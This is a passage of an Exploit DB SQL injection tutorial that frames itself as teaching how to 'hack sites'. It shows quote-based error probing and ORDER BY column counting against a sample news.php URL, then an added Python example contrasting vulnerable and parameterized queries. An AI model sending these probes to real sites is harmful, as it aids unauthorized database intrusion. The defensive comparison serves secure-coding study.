SQL Injection attacks and tutorials by Exploit DB.pdf
SQL INJECTION TUTORIAL
A Tutorial on my-sql
Author:- Prashant a.k.a t3rm!n4t0r
C0ntact:- happyterminator@gmail.com
Greets to: - vinnu, b0nd, fb1h2s, Anarki, Nikhil, D4Rk357, Beenu
Special Greets to: - Hackers Garage Crew and r45c41
INTRODUCTION
This tutorial will give you a basic idea of how to hack sites with a MySQL
injection vulnerability. MySQL databases are very common these days, and
many vulnerabilities come with them ☺. Here we will discuss how to exploit those
vulnerabilities manually, without any sqli helper etc. ☺
NOTE: - INTENDED FOR EDUCATIONAL PURPOSE ONLY. THE
AUTHOR WON'T BE HELD RESPONSIBLE FOR THE MISUSE OF
THIS ARTICLE.
MySQL is a relational database management system (RDBMS) that runs as
a server providing multi-user access to a number of databases. MySQL is
officially pronounced /maɪˌɛskjuːˈɛl/ ("My S-Q-L") but is often
pronounced /maɪ ˈsiːkwəl/ ("My Sequel"). It is named for original developer
Michael Widenius's daughter My.
The MySQL development project has made its source code available under
the terms of the GNU General Public License, as well as under a variety of
proprietary agreements. MySQL is owned and sponsored by a single
for-profit firm, the Swedish company MySQL AB, now owned by Sun
Microsystems, a subsidiary of Oracle Corporation.
Members of the MySQL community have created several forks such as
Drizzle, OurDelta, Percona Server, and MariaDB. All of these forks were in
progress before the Oracle acquisition (Drizzle was announced 8 months
before the Sun acquisition).
Free-software projects that require a full-featured database management
system often use MySQL. Such projects include (for example) WordPress,
phpBB, Drupal and other software built on the LAMP software stack.
MySQL is also used in many high-profile, large-scale World Wide Web
products including Wikipedia and Facebook.
So let's start with how to exploit the MySQL injection vulnerability ☺
We will try to get some useful information from SQL injection ☺
THE VERY FIRST STEP: CHECKING FOR VULNERABILITY
Suppose we have a website like this:
http://www.site.com/news.php?id=7
To test this URL, we add a quote (') to it:
http://www.site.com/news.php?id=7'
On executing it, if we get an error like this: "You have an error in your SQL
syntax; check the manual that corresponds to your MySQL server version
for the right etc...", or something like that, it means the target is vulnerable
to SQL injection ☺
FINDING THE COLUMNS
To find the number of columns we use the ORDER BY statement (which tells the
database how to order the result). To use it, we increment the number until we
get an error, like this:
http://www.site.com/news.php?id=7 order by 1/* <-- no error
http://www.site.com/news.php?id=7 order by 2/* <-- no error
http://www.site.com/news.php?id=7 order by 3/* <-- no error
http://www.site.com/news.php?id=7 order by 4/* <-- error (we get a message
like this: Unknown column '4' in 'order clause', or something like that)
This means that it has 3 columns, because we got an error on 4.
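Why the quote test and the ORDER BY test above produce errors, and what removes them, shown as an added example that is not part of the original tutorial. It assumes Python's built-in sqlite3 in place of PHP/MySQL (so the error wording differs), and the table layout and function names are hypothetical.

```python
import re
import sqlite3

def make_db():
    """Constructed sample data: a 3-column table standing in for news.php's."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO news VALUES (7, 'Hello', 'First post')")
    return db

def fetch_vulnerable(db, raw_id):
    """Concatenates the id parameter into the statement, so it is parsed as SQL."""
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    try:
        return ("rows", db.execute(sql).fetchall())
    except sqlite3.Error as exc:
        # Returning the database error to the client is what makes the
        # quote test and the ORDER BY count observable from outside.
        return ("sql_error", str(exc))

def fetch_hardened(db, raw_id):
    """Validates the id, binds it as a parameter, and exposes no database error."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return ("rejected", None)  # caller answers with a generic 400/404
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    try:
        return ("rows", db.execute(sql, (int(raw_id),)).fetchall())
    except sqlite3.Error:
        return ("rejected", None)  # log server-side, never echo the message

# The same id values the tutorial appends to news.php?id=
PROBES = ["7", "7'", "7 order by 3", "7 order by 4"]

def compare(db):
    """Maps each probe to (vulnerable outcome, hardened outcome)."""
    return {p: (fetch_vulnerable(db, p)[0], fetch_hardened(db, p)[0])
            for p in PROBES}

if __name__ == "__main__":
    for probe, (vuln, hard) in compare(make_db()).items():
        print(f"id={probe!r:16} vulnerable={vuln:10} hardened={hard}")
```

In the hardened version the response to every malformed id is identical, so neither test yields any information about the query or the column count.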